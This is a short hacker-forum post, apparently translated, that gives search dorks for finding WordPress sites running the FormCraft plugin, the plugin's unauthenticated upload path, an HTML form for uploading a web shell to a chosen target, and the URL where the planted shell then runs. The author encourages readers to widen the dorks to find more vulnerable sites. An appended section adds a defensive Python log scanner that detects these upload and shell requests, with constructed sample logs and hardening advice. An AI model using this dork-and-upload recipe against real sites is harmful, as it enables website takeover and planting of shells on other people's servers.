Hi guys, Mr.Greatskiller here again
It's been a while since I posted
The usual laziness factor :v
Let's get straight to it
Dork :
- inurl:"wp-content//plugins/formcraft/"
- inurl:"wp-content//plugins/formcraft/" site:.de
(expand the rest of the dorks yourself, bro, so you get lots of vulnerable and untouched sites :v lol)
Exploit :
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/
CSRF Script :
<br />
<form action="http://www.target.co.li/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data" method="POST">
<input name="files[]" type="file" /><button>Upload</button>
</form>
*Save as: .html
*replace target.co.li ~> with the URL of your target
Find a target using the dorks above
Then add the exploit path
What's left now? Well, you put the target into the CSRF form and upload your shell or script
Shell Access :
target.co.li/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php
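
From the defender's side, the two request paths named in this post are what to look for in web server access logs. The following is an added example, not part of the original post: it assumes combined log format, and the sample log lines, IP addresses and file names are constructed.

```python
import re
from collections import defaultdict

# Paths taken from the post: the upload handler and the directory it writes to.
UPLOAD_RE = re.compile(
    r"/wp-content/+plugins/formcraft/file-upload/server/php/(?:upload\.php)?(?:\?|$)", re.I)
DROPPED_RE = re.compile(
    r"/wp-content/+plugins/formcraft/file-upload/server/php/files/[^?\s]+\.(?:php\d?|phtml|phar)(?:\?|$)", re.I)
# Combined log format: ip - user [time] "METHOD path HTTP/x" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return {ip: {"uploads": [...], "script_hits": [...]}} for matching requests."""
    findings = defaultdict(lambda: {"uploads": [], "script_hits": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, ts, method, path, status = m.groups()
        if method == "POST" and UPLOAD_RE.search(path):
            findings[ip]["uploads"].append((ts, path, int(status)))
        elif DROPPED_RE.search(path):
            findings[ip]["script_hits"].append((ts, path, int(status)))
    return dict(findings)

def likely_compromise(findings):
    """IPs that POSTed to the upload handler and also received a 200 for a
    script inside the upload directory (no time ordering is checked)."""
    return sorted(ip for ip, f in findings.items()
                  if f["uploads"] and any(s == 200 for _, _, s in f["script_hits"]))

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "POST /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/example.php HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Mar/2024:10:05:00 +0000] "POST /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 200 290 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Mar/2024:10:05:04 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/photo.jpg HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.99 - - [10/Mar/2024:10:06:00 +0000] "GET /wp-content//plugins/formcraft/file-upload/server/php/files/example.php HTTP/1.1" 404 0 "-" "curl/8"',
]

if __name__ == "__main__":
    for ip in likely_compromise(scan(SAMPLE_LOG)):
        print("investigate:", ip)
```

Any script file found under the `files/` directory on disk warrants investigation regardless of what the logs show, and the web server should be configured so that nothing in that upload directory is executed as PHP.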